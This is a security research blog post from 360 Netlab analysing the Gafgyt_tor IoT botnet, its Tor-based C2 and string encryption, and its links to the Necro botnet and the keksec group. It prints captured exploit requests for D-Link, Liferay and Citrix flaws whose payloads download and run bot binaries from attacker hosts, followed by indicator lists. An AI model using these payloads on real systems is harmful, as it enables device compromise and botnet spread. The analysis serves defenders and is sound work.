<!DOCTYPE html>
<html lang="en">
<head>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />

    <title>Gafgtyt_tor and Necro are on the move again</title>
    <meta name="HandheldFriendly" content="True" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="stylesheet" type="text/css" href="/assets/built/screen.css?v=db215a41fd" />

    <link rel="shortcut icon" href="/favicon.png" type="image/png" />
    <link rel="canonical" href="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    <link rel="amphtml" href="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/amp/" />
    
    <meta property="og:site_name" content="360 Netlab Blog - Network Security Research Lab at 360" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Gafgtyt_tor and Necro are on the move again" />
    <meta property="og:description" content="Overview
Since February 15, 2021, 360Netlab&#x27;s BotMon system has continuously detected a
new variant of the Gafgyt family, which uses Tor for C2 communication to hide
the real C2 and encrypts sensitive strings in the samples. This is the first
time we found a Gafgyt variant using the Tor mechanism, so we named the variant
Gafgyt_tor. Further analysis revealed that the family is closely related to the 
Necro
[https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/] 
 fami" />
    <meta property="og:url" content="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/" />
    <meta property="article:published_time" content="2021-03-04T14:00:00.000Z" />
    <meta property="article:modified_time" content="2021-03-04T13:59:59.000Z" />
    <meta property="article:tag" content="Necro" />
    <meta property="article:tag" content="Necromporph" />
    <meta property="article:tag" content="Freakout" />
    <meta property="article:tag" content="gafgyt_tor" />
    <meta property="article:tag" content="Tor" />
    <meta property="article:tag" content="DDoS" />
    <meta property="article:tag" content="gafgyt" />
    <meta property="article:tag" content="Tsunami" />
    <meta property="article:tag" content="keksec" />
    <meta property="article:tag" content="Botnet" />
    <meta property="article:tag" content="CVE-2019-16920" />
    <meta property="article:tag" content="CVE-2019-19781" />
    <meta property="article:tag" content="ak47scan" />
    
    <meta name="twitter:card" content="summary" />
    <meta name="twitter:title" content="Gafgtyt_tor and Necro are on the move again" />
    <meta name="twitter:description" content="Overview
Since February 15, 2021, 360Netlab&#x27;s BotMon system has continuously detected a
new variant of the Gafgyt family, which uses Tor for C2 communication to hide
the real C2 and encrypts sensitive strings in the samples. This is the first
time we found a Gafgyt variant using the Tor mechanism, so we named the variant
Gafgyt_tor. Further analysis revealed that the family is closely related to the 
Necro
[https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/] 
 fami" />
    <meta name="twitter:url" content="https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="jinye" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="Necro, Necromporph, Freakout, gafgyt_tor, Tor, DDoS, gafgyt, Tsunami, keksec, Botnet, CVE-2019-16920, CVE-2019-19781, ak47scan" />
    <meta name="twitter:site" content="@360Netlab" />
    <meta name="twitter:creator" content="@SethKingHi" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "360 Netlab Blog - Network Security Research Lab at 360",
        "logo": "https://blog.netlab.360.com/content/images/2019/02/netlab-brand-5.png"
    },
    "author": {
        "@type": "Person",
        "name": "jinye",
        "image": {
            "@type": "ImageObject",
            "url": "https://blog.netlab.360.com/content/images/2019/12/400--2-.jpeg",
            "width": 400,
            "height": 400
        },
        "url": "https://blog.netlab.360.com/author/jinye/",
        "sameAs": [
            "https://twitter.com/SethKingHi"
        ]
    },
    "headline": "Gafgtyt_tor and Necro are on the move again",
    "url": "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
    "datePublished": "2021-03-04T14:00:00.000Z",
    "dateModified": "2021-03-04T13:59:59.000Z",
    "keywords": "Necro, Necromporph, Freakout, gafgyt_tor, Tor, DDoS, gafgyt, Tsunami, keksec, Botnet, CVE-2019-16920, CVE-2019-19781, ak47scan",
    "description": "Overview\nSince February 15, 2021, 360Netlab&#x27;s BotMon system has continuously detected a\nnew variant of the Gafgyt family, which uses Tor for C2 communication to hide\nthe real C2 and encrypts sensitive strings in the samples. This is the first\ntime we found a Gafgyt variant using the Tor mechanism, so we named the variant\nGafgyt_tor. Further analysis revealed that the family is closely related to the \nNecro\n[https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/] \n fami",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://blog.netlab.360.com/"
    }
}
    </script>

    <script src="/public/ghost-sdk.min.js?v=db215a41fd"></script>
<script>
ghost.init({
	clientId: "ghost-frontend",
	clientSecret: "2a7213b591a9"
});
</script>
    <meta name="generator" content="Ghost 2.13" />
    <link rel="alternate" type="application/rss+xml" title="360 Netlab Blog - Network Security Research Lab at 360" href="https://blog.netlab.360.com/rss/" />
    
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-83587830-1', 'auto');
  ga('send', 'pageview');

</script>

<!-- Fix first paragraph font size -->
<style type="text/css">
 .post-template .post-content > p:first-child {font-size: 1em;}
</style>

</head>
<body class="post-template tag-necro tag-necromporph tag-freakout tag-gafgyt_tor tag-tor tag-ddos tag-gafgyt tag-tsunami tag-keksec tag-botnet tag-cve-2019-16920 tag-cve-2019-19781 tag-ak47scan">

    <div class="site-wrapper">

             <header
    class="site-header outer">
    <div class="inner">
        <nav class="site-nav">
    <div class="site-nav-left">
                <a class="site-nav-logo" href="https://blog.netlab.360.com"><img src="https://blog.netlab.360.com/content/images/2019/02/netlab-brand-5.png" alt="360 Netlab Blog - Network Security Research Lab at 360" /></a>
            <ul class="nav" role="menu">
    <li class="nav-botnet" role="menuitem"><a href="https://blog.netlab.360.com/tag/botnet/">Botnet</a></li>
    <li class="nav-dnsmon" role="menuitem"><a href="https://blog.netlab.360.com/tag/dnsmon/">DNSMon</a></li>
    <li class="nav-ddos" role="menuitem"><a href="https://blog.netlab.360.com/tag/ddos/">DDoS</a></li>
    <li class="nav-passivedns" role="menuitem"><a href="https://blog.netlab.360.com/tag/pdns/">PassiveDNS</a></li>
    <li class="nav-marai" role="menuitem"><a href="https://blog.netlab.360.com/tag/mirai/">Marai</a></li>
    <li class="nav-dta" role="menuitem"><a href="https://blog.netlab.360.com/tag/dta/">DTA</a></li>
</ul>

    </div>
    <div class="site-nav-right">
        <div class="social-links">
                <a class="social-link social-link-tw" href="https://twitter.com/360Netlab" title="Twitter" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M30.063 7.313c-.813 1.125-1.75 2.125-2.875 2.938v.75c0 1.563-.188 3.125-.688 4.625a15.088 15.088 0 0 1-2.063 4.438c-.875 1.438-2 2.688-3.25 3.813a15.015 15.015 0 0 1-4.625 2.563c-1.813.688-3.75 1-5.75 1-3.25 0-6.188-.875-8.875-2.625.438.063.875.125 1.375.125 2.688 0 5.063-.875 7.188-2.5-1.25 0-2.375-.375-3.375-1.125s-1.688-1.688-2.063-2.875c.438.063.813.125 1.125.125.5 0 1-.063 1.5-.25-1.313-.25-2.438-.938-3.313-1.938a5.673 5.673 0 0 1-1.313-3.688v-.063c.813.438 1.688.688 2.625.688a5.228 5.228 0 0 1-1.875-2c-.5-.875-.688-1.813-.688-2.75 0-1.063.25-2.063.75-2.938 1.438 1.75 3.188 3.188 5.25 4.25s4.313 1.688 6.688 1.813a5.579 5.579 0 0 1 1.5-5.438c1.125-1.125 2.5-1.688 4.125-1.688s3.063.625 4.188 1.813a11.48 11.48 0 0 0 3.688-1.375c-.438 1.375-1.313 2.438-2.563 3.188 1.125-.125 2.188-.438 3.313-.875z"/></svg>
</a>
        </div>
            <a class="rss-button" href="https://feedly.com/i/subscription/feed/https://blog.netlab.360.com/rss/" title="RSS" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><circle cx="6.18" cy="17.82" r="2.18"/><path d="M4 4.44v2.83c7.03 0 12.73 5.7 12.73 12.73h2.83c0-8.59-6.97-15.56-15.56-15.56zm0 5.66v2.83c3.9 0 7.07 3.17 7.07 7.07h2.83c0-5.47-4.43-9.9-9.9-9.9z"/></svg>
</a>
    </div>
</nav>
    </div>
    </header>


    <main id="site-main" class="site-main outer">
        <div class="inner">

            <article class="post-full post tag-necro tag-necromporph tag-freakout tag-gafgyt_tor tag-tor tag-ddos tag-gafgyt tag-tsunami tag-keksec tag-botnet tag-cve-2019-16920 tag-cve-2019-19781 tag-ak47scan no-image">

                <header class="post-full-header">
                    <section class="post-full-meta">
                        <time class="post-full-meta-date" datetime="2021-03-04">4 March                            2021</time>
                        <span class="date-divider">/</span> <a href="/tag/necro/">Necro</a>
                    </section>
                    <h1 class="post-full-title">Gafgtyt_tor and Necro are on the move again</h1>
                </header>


                <section class="post-full-content">
                    <div class="post-content">
                        <h2 id="overview">Overview</h2>
<p>Since February 15, 2021, 360Netlab's BotMon system has continuously detected a new variant of the Gafgyt family, which uses Tor for C2 communication to hide the real C2 and encrypts sensitive strings in the samples. This is the first time we found a Gafgyt variant using the Tor mechanism, so we named the variant Gafgyt_tor. Further analysis revealed that the family is closely related to the <a href="https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/">Necro</a> family we made public in January, and is behind the same group of people, the so-called keksec group <a href="https://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg">[1]</a> <a href="https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/">[2]</a>. In this blog, we will introduce Gafgyt_tor and sort out other recent botnets operated by this group.</p>
<p>The key points of this article are as follows.</p>
<ol>
<li>
<p>Gafgyt_tor uses Tor to hide C2 communication, over 100 Tor proxies can be built in, and new samples are continuously updating the proxy list.</p>
</li>
<li>
<p>Gafgyt_tor share the same origin with the Gafgyt  samples discturibed by the keksec group, the core function is still DDoS attacks and scanning.</p>
</li>
<li>
<p>The keksec group reuse the code between different bot families.</p>
</li>
<li>
<p>In addition, the keksec group also reuse a bunch of IP addresses for a long time.</p>
</li>
</ol>
<h2 id="sampleanalysis">Sample Analysis</h2>
<h3 id="propagation">Propagation</h3>
<p>The currently discovered Gafgyt_tor botnet is mainly propagated through Telnet weak passwords and the following three vulnerabilities.</p>
<ul>
<li>D-Link RCE (CVE-2019-16920)</li>
</ul>
<pre><code>POST /apply_sec.cgi HTTP/1.1
Host: %s:%d
User-Agent: kpin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close
Referer: http://%s:%d/login_pic.asp
Cookie: uid=1234123
Upgrade-Insecure-Requests: 1

html_response_page=login_pic.asp&amp;action=ping_test&amp;ping_ipaddr=127.0.0.1%%0acd%%20%%2Ftmp;busybox%%20wget%%20http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFarm7%%20%7C%7C%%20wget%%20http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFarm7%%20-O%%20.kpin;chmod%%20777%%20.%%2F.kpin;.%2F.kpin;rm%%20-rf%%20.kpin
</code></pre>
<ul>
<li>Liferay Portal RCE</li>
</ul>
<pre><code>POST /api/jsonws/expandocolumn/update-column HTTP/1.1
Host: %s:%d
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.0
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: Basic dGVzdEBsaWZlcmF5LmNvbTp0ZXN0

%2BdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource&amp;defaultData.userOverridesAsString=HexAsciiSerializedMap:...
</code></pre>
<ul>
<li>Citrix CVE-2019-19781</li>
</ul>
<pre><code> POST /vpns/portal/scripts/newbm.pl HTTP/1.1
 Host: %s:%d
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
 Accept-Encoding: gzip, deflate
 Accept: */*
 Connection: keep-alive
 NSC_USER: ../../../netscaler/portal/templates/flialwznxz
 NSC_NONCE: 12
 Content-Length: %d
 Content-Type: application/x-www-form-urlencoded
 
 url=127.0.0.1&amp;title=%%5B%%25+template.new%%28%%7B%%27BLOCK%%27%%3D%%27print+readpipe%%28%%22cd+%%2Ftmp%%3Bwget+http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFx86+%%7C%%7C+wget+http%%3A%%2F%%2F%s%%2Fbins%%2FAJhkewbfwefWEFx86+-O+.kpin%%3Bchmod+777+.%%2F.kpin%%3B.%%2F.kpin%%3Brm+-rf+.kpin%%22%%29%%27%%7D%%29%%25%%5D&amp;desc=desc&amp;UI_inuse=a 
</code></pre>
<h3 id="encryption">Encryption</h3>
<p>Gafgyt_tor integrates a replacement encryption algorithm for encrypting C2 and sensitive strings to counter detection and static analysis. Sensitive strings include commands, IPC pathnames, DDoS-related attack strings, etc.</p>
<p>The following is a comparison of ciphertext and plaintext C2.</p>
<pre><code># ciphertext
'&quot;?&gt;K!tF&gt;iorZ:ww_uBw3Bw' 

# plaintext
'wvp3te7pkfczmnnl.onion'
</code></pre>
<p>The Gafgyt_tor variants we detected so far all use the same C2 wvp3te7pkfczmnnl.onion.</p>
<p>Some of the cipher decryption results are as follows.</p>
<pre><code># commands
~-6mvgmv    -    LDSERVER
1-|         -         UDP
cD|         -         TCP
ej~-        -        HOLD
51,U        -        JUNK
c~6         -         TLS
6c-         -         STD
-,6         -         DNS
6D7,,mv     -     SCANNER
j,          -          ON
jdd         -         OFF
jge         -         OVH
.~7DU,1v6m  -  BLACKNURSE

# DDoS-related attack
7~~         -         ALL
6p,         -         SYN
v6c         -         RST
dx,         -         FIN
7DU         -         ACK
|6e         -         PSH

# Scan-related
aDbwwtr3bw  -  WChnnecihn
aQuq        -         W.1
aEcc        -        WxTT
74tw!       -       Agent
1;t=        -        User

# misc
|x,&lt;        -        PING
=ru_Brf_    -    rc.local
</code></pre>
<p>The following is the python decryption code we wrote based on the inverse results.</p>
<pre><code> def decode(encoded, encodes):
    idx = 0
    decodes = b'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. '
    decoded = bytearray()

    while ( idx &lt; len(encoded)):
        for table_idx in range(0, 64):
            if encoded[idx] == encodes[table_idx]:
                decoded.append(decodes[table_idx])
        idx += 1

    print(decoded)
 
encodes = b'%q*KC)&amp;F98fsr2to4b3yi_:wB&gt;z=;!k?&quot;EAZ7.D-md&lt;ex5U~h,j|$v6c1ga+p@un'
encoded_cc = b'&quot;?&gt;K!tF&gt;iorZ:ww_uBw3Bw'
decode(encoded_cc, encodes)
</code></pre>
<h3 id="communication">Communication</h3>
<p>Compared with other Gafgyt variants, the biggest change of Gafgyt_tor is that the C2 communication is based on Tor, which increases the difficulty of detection and blocking. The Tor-based C2 communication mechanism has been seen in other families we have analyzed before( <a href="https://blog.netlab.360.com/matryosh-botnet-is-spreading/">Matryosh</a> <a href="https://blog.netlab.360.com/the-leethozer-botnet/">leethozer</a> <a href="https://blog.netlab.360.com/moobot-0day-unixcctv-dvr/">moobot</a> ), but this is the first time we encountered it in the Gafgyt family.</p>
<ul>
<li>Code changes</li>
</ul>
<p>Compared with other versions, the code structure of the main function of Gafgyt_tor, which adds the Tor proxy function, has changed very much, as shown in the following figure.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/ver1_ver2_cmp_cfg.en.png" class="kg-image"></figure><p>The original initConnection() function, which is responsible for establishing the C2 connection, is gone, replaced by a large section of code responsible for establishing the Tor connection. The newly added Tor-related functions are as follows.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/tor_functions.png" class="kg-image"></figure><p>Among them, tor_socket_init is responsible for initializing a list of proxy nodes, each containing an ip address and a port.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/tor_socket_init.png" class="kg-image"></figure><p>Our analysis shows that the number of proxy nodes integrated in each sample is always 100+, with a maximum of 173.</p>
<p>After initializing the proxy list, the sample will select a random node from the list to enable Tor communication via tor_retrieve_addr and tor_retrieve_port.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/random_select_tor_node.png" class="kg-image"></figure><p>After establishing a connection with the Tor proxy, Gafgyt_tor starts requesting wvp3te7pkfczmnnl.onion through the darknet waiting for instructions. This C2 address has not changed in the samples we have analyzed, but the communication port is continuously changing.</p>
<ul>
<li>The command</li>
</ul>
<p>The core function of Gafgyt_tor is still DDoS attack and scanning, so it mostly follows the common Gafgyt directive, a new directive called LDSERVER has been added. C2 can specify the download server used in Gafgyt_tor's exploit through this directive, as shown in the figure below.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/dyn_config_scan_payload_dl_server-1.png" class="kg-image"></figure><p>This directive means that C2 can dynamically switch download servers, so that it can quickly switch to a new download server to continue propagation if the current one is blocked.</p>
<h3 id="someotherthings">Some other things</h3>
<p>Gafgyt_tor uses a few uncommon coding tricks in addition to the modification of the communication function.</p>
<ul>
<li>Singleton mode</li>
</ul>
<p>Single instance mode is implemented using Unix domain sockets (an IPC mechanism), which requires a pathname to be specified, which is also encrypted. As shown below, k4=f2t is decrypted to ugrade.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/singleton_connect-2.png" class="kg-image"></figure><ul>
<li>Function name obfuscation</li>
</ul>
<p>None of the Gafgyt_tor samples we collected have been stripped, so the complete symbolic information is preserved in the samples, and most of the samples are scanned and propagated using a function named ak47Scan. In the sample captured on February 24 we found that the function name was obfuscated as a random string, so it can be assumed that the sample is in active development stage and the authors are gradually strengthening Gafgyt_tor's ability to counter analysis and detection.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/ak47scan_v2_comp_v2.1_obf.en.png" class="kg-image"></figure><h2 id="sampleorigin">Sample origin</h2>
<p>While analyzing the IoC of Gafgyt_tor, we noticed that a download server IP 45.145.185.83 was used by Necro botnet, which appeared in early January this year:</p>
<p>gxbrowser.net is one of Necro's 3 C2s, and the above image shows that it has resolved to this download server IP of Gafgyt_tor several times.</p>
<p>Further analysis shows that this IP and another Necro C2 IP 193.239.147.224 were also used as C2 by other versions of Gafgyt and Tsunami botnet in early February, which apparently share code with Gafgyt_tor.</p>
<ol>
<li>
<p>Both have decryption functions named decode, with identical code structures.</p>
</li>
<li>
<p>Both have scan functions named ak47scan and ak47telscan.</p>
</li>
</ol>
<p>Their decode function decode() differs only in the code table.</p>
<pre><code># Code table in the gafgyt sample
'%q*KC)&amp;F98fsr2to4b3yi_:wB&gt;z=;!k?&quot;EAZ7.D-md&lt;ex5U~h,j|$v6c1ga+p@un0'

# Code table in tsunami sample
'xm@_;w,B-Z*j?nvE|sq1o$3&quot;7zKC&lt;F)utAr.p%=&gt;4ihgfe6cba~&amp;5Dk2d!8+9Uy:0'
</code></pre>
<p>The following figure is a comparison of their ak47scan() functions, you can see that the function and structure is actually similar, but there are changes in the way it runs and the ports it scans.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/ak47scan_history.png" class="kg-image"></figure><p>Based on the binary characteristics of the decode() and ak47scan() functions mentioned above, we found more such Tsunami and Gafgyt samples in our sample database, which are characterized as follows.</p>
<ol>
<li>
<p>Tsunami samples appear in mid-August 2020 and are active for a short period of time.</p>
</li>
<li>
<p>Gafgyt samples were spreading intermittently from September to December 2020.</p>
</li>
<li>
<p>From early to mid-February, first Tsunami samples resumed propagation, then Gafgyt, followed by Gafgyt_tor.</p>
</li>
<li>
<p>There are many similarities between the currently spreading Gafgyt_tor variants and the previously captured Gafgyt samples, and the code is clearly same origin.</p>
</li>
<li>
<p>These variants of botnet frequently reuse same download server and C2 IP.</p>
</li>
</ol>
<p>We can see that there was no update in January this year, we guess because the authors focused their efforts on Necro. In terms of binary characteristics, there is no similarity with Gafgyt_tor as Necro is written in Python, but we see there are some commonalities in propagation methods.</p>
<ol>
<li>
<p>Both changed different exploits in a short period of time, presumably to improve the propagation effect.</p>
</li>
<li>
<p>Both adopted the &quot;develop-and-distribute&quot; approach to continuously improve the botnet function, resulting in a large number of different samples being distributed in a short period of time.</p>
</li>
</ol>
<p>Based on the above analysis, we think that Gafgyt_tor and Necro are very likely operated by the same group of people, who have a pool of IP addresses and multiple botnet source codes, and have the ability of continuous development. In actual operation, they form different families of botnets, but reuse infrastructure such as IP address, for example, the above-mentioned IP 45.145.185.83 address acts as different C2 for different botnets since the end of last year, the timeline of different functions is roughly shown in the figure below.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/ip_timeline-3.png" class="kg-image"></figure><p>Here are some conclusions about the group:</p>
<ol>
<li>
<p>They have at least the source code for Necro, Gafgyt and Tsunami.</p>
</li>
<li>
<p>They continue to upgrade and rotate the botnets in their hands.</p>
</li>
<li>
<p>They have a pool of IP address resources and reuse them in different botnets.</p>
</li>
<li>
<p>The group also keeps up with n-day vulnerabilities in IoT and use them promptly to facilitate their own botnets.</p>
</li>
</ol>
<p>The timeline chart below shows the Linux IoT botnet family operated by this group that we detected from last August to now.</p>
<figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2021/03/keksec_samples_timeline-2.png" class="kg-image"></figure><h2 id="contactus">Contact us</h2>
<p>Readers are always welcomed to reach us on twitter, or email to netlab at 360 dot cn.</p>
<h2 id="ioc">IoC</h2>
<ul>
<li>MD5</li>
</ul>
<pre><code># tsunami
3ab32e92917070942135f5c5a545127d

# gafgyt
f1d6fbd0b4e6c6176e7e89f1d1784d14

# gafgyt_tor
eb77fa43bb857e68dd1f7fab04ed0de4
dce3d16ea9672efe528f74949403dc93
bfaa01127e03a119d74bdb4cb0f557ec
a6bdf72b8011be1edc69c9df90b5e0f2
5c1153608be582c28e3287522d76c02f
54e2687070de214973bdc3bc975049b5
b40d8a44b011b79178180a657b052527
1cc68eb2d9713925d692194bd0523783
94a587198b464fc4f73a29c8d8d6e420
2b2940d168a60990377fea8b6158ba22
56439912093d9c1bf08e34d743961763
2d6917fe413163a7be7936a0609a0c2d
8cd99b32ec514f348f4273a814f97e79
1c966d79319e68ccc66f1a2231040adb
47275afdb412321610c08576890093d7
3c5758723980e6b9315ac6e6c32e261d
980d4d0ac9335ae1db6938e8aeb3e757
513bc0091dfa208249bd1e6a66d9d79e
8e551c76a6b17299da795c2b69bb6805
61b93c03cb5af31b82c11d0c86f82be1
69cab222e42c7177655f490d849e18c5
7cbdd215e7f1e17fc589de2df3f09ac9
6b631fed1416c2cd16ca01738fdfe61a
90a716280fe1baee0f056a79c3aa724d
3b4f844c7dd870e8b8c1d5a397a29514
853dc777c5959db7056f64b34e938ba5
3eccab18fa690bbfdb6e10348bc40b02
e78e04aad0915f2febcbb19ef6ffc4fe
b99115a6ea41d85dea5c96d799e65353
4b95dfc5dc523f29eebf7d50e98187c2
4c271f8068bc64686b241eb002e15459
843a7fec9a8e2398a69dd7dfc49afdd2
7122bcd084d2d0e721ec7c01cf2a6a57
10f6b09f88e0cf589d69a764ff4f455b
f91083e19eed003ac400c1e94eba395e
</code></pre>
<ul>
<li>C2</li>
</ul>
<pre><code>wvp3te7pkfczmnnl.onion
</code></pre>
<ul>
<li>Download URL</li>
</ul>
<pre><code>http://45.153.203.124/bins/AJhkewbfwefWEFx86
http://45.153.203.124/bins/AJhkewbfwefWEFsh4
http://45.153.203.124/bins/AJhkewbfwefWEFmips

http://45.153.203.124/S1eJ3/lPxdChtp3zx86
http://45.153.203.124/S1eJ3/lPxdChtp3zsh4
http://45.153.203.124/S1eJ3/lPxdChtp3zppc-440fp
http://45.153.203.124/S1eJ3/lPxdChtp3zmpsl
http://45.153.203.124/S1eJ3/lPxdChtp3zmips
http://45.153.203.124/S1eJ3/lPxdChtp3zarm7
http://45.153.203.124/S1eJ3/lPxdChtp3zarm

http://45.145.185.83/bins/AJhkewbfwefWEFx86
http://45.145.185.83/bins/AJhkewbfwefWEFspc
http://45.145.185.83/bins/AJhkewbfwefWEFsh4
http://45.145.185.83/bins/AJhkewbfwefWEFppc
http://45.145.185.83/bins/AJhkewbfwefWEFmips
http://45.145.185.83/bins/AJhkewbfwefWEFi586
http://45.145.185.83/bins/AJhkewbfwefWEFarm7
http://45.145.185.83/bins/AJhkewbfwefWEFarm

http://45.145.185.83/S1eJ3/lPxdChtp3zsh4
http://45.145.185.83/S1eJ3/lPxdChtp3zmpsl
http://45.145.185.83/S1eJ3/lPxdChtp3zmips
http://45.145.185.83/S1eJ3/lPxdChtp3zi686
http://45.145.185.83/S1eJ3/lPxdChtp3zbsd
http://45.145.185.83/S1eJ3/lPxdChtp3zarm7
http://45.145.185.83/S1eJ3/lPxdChtp3zarm64
http://45.145.185.83/S1eJ3/lPxdChtp3zarm

http://45.145.185.83/S1eJ3/IObeENwjx86
http://45.145.185.83/S1eJ3/IObeENwjmips
http://45.145.185.83/S1eJ3/IObeENwjarm5
http://45.145.185.83/S1eJ3/IObeENwjarm4
http://45.145.185.83/S1eJ3/IObeENwjarm
</code></pre>
<ul>
<li>Tor Proxy</li>
</ul>
<pre><code>103.125.218.111
103.125.218.111
103.82.219.42
104.155.207.91
104.224.179.229
107.20.204.32
111.90.159.138
116.202.107.151
116.203.210.124
116.203.210.124
116.203.210.124
116.203.210.124
116.203.210.124
119.28.149.37
128.199.45.26
130.193.56.117
134.122.4.130
134.122.4.130
134.122.59.236
134.122.59.236
134.122.59.236
134.209.230.13
134.209.249.97
135.181.137.237
138.68.6.227
139.162.149.58
139.162.32.82
139.162.42.124
139.99.239.154
142.47.219.133
143.110.230.187
145.239.83.129
146.59.156.72
146.59.156.76
146.59.156.77
146.66.180.176
148.251.177.144
157.230.27.96
157.230.98.211
157.230.98.77
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.174.108.130
158.247.211.132
159.65.69.186
159.69.203.65
159.69.203.65
159.89.19.9
161.35.84.202
165.22.194.250
165.22.94.245
167.172.123.221
167.172.173.3
167.172.177.33
167.172.178.215
167.172.179.199
167.172.180.219
167.172.190.42
167.233.6.47
167.71.236.109
168.119.37.152
168.119.37.152
168.119.37.152
168.119.37.152
168.119.37.152
168.119.61.251
172.104.240.74
172.104.4.144
176.37.245.132
178.62.215.4
18.191.18.101
18.229.49.115
185.105.237.253
185.106.121.176
185.106.122.10
185.128.139.56
185.180.223.198
185.18.215.170
185.18.215.178
185.212.128.115
185.212.128.115
185.212.128.115
185.212.128.115
185.212.128.115
185.212.128.115
185.217.1.30
188.127.231.152
188.165.233.121
188.166.17.35
188.166.34.137
188.166.79.209
188.166.79.209
188.166.80.74
188.166.82.232
188.166.82.232
188.227.224.110
188.68.52.220
192.46.209.98
192.99.169.229
193.123.35.48
193.187.173.33
195.123.222.9
195.93.173.53
197.156.89.19
198.27.82.186
198.74.54.182
199.247.4.110
201.40.122.152
20.52.130.140
20.52.130.140
20.52.130.140
20.52.147.137
20.52.37.89
20.52.37.89
206.81.17.232
206.81.27.29
212.71.253.168
212.8.244.112
217.12.201.190
217.12.201.190
217.12.201.190
217.144.173.78
217.170.127.226
217.61.98.33
34.239.11.167
35.189.88.51
35.192.111.58
35.192.111.58
37.200.66.166
3.91.139.103
45.33.45.209
45.33.79.19
45.33.82.126
45.79.207.110
45.81.225.67
45.81.225.67
45.81.226.8
45.81.226.8
45.81.226.8
45.92.94.83
46.101.156.38
46.101.159.138
47.90.1.153
49.147.80.102
50.116.61.125
5.100.80.141
51.11.240.222
51.11.240.222
51.116.185.181
51.116.185.181
51.195.201.47
51.195.201.50
5.167.53.191
51.68.191.153
51.75.161.21
51.83.185.71
51.83.186.137
51.89.165.233
52.47.87.178
5.63.13.54
66.42.34.110
67.205.130.65
68.183.67.182
68.183.82.50
79.124.62.26
80.251.220.190
8.210.163.246
8.210.163.246
87.236.215.248
88.198.167.20
88.198.167.20
91.236.251.131
94.23.40.220
95.179.163.1
95.179.163.1
95.179.163.1
95.179.163.1
95.179.164.28
95.179.164.28
95.179.164.28
95.188.93.135
95.216.123.39
95.216.137.149
95.217.27.5
</code></pre>
<h2 id="references">References</h2>
<p><a href="https://blog.netlab.360.com/necro/">https://blog.netlab.360.com/necro/</a><br>
<a href="https://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg">https://mp.weixin.qq.com/s/D30y0qeicKnHmP9Kad-pmg</a><br>
<a href="https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/">https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/</a></p>
<p></p><p></p>
                    </div>
                </section>


                <footer class="post-full-footer">


                    
<section class="author-card">
        <img class="author-profile-image" src="https://blog.netlab.360.com/content/images/size/w100/2019/12/400--2-.jpeg" alt="jinye" />
    <section class="author-card-content">
        <h4 class="author-card-name"><a href="/author/jinye/">jinye</a></h4>
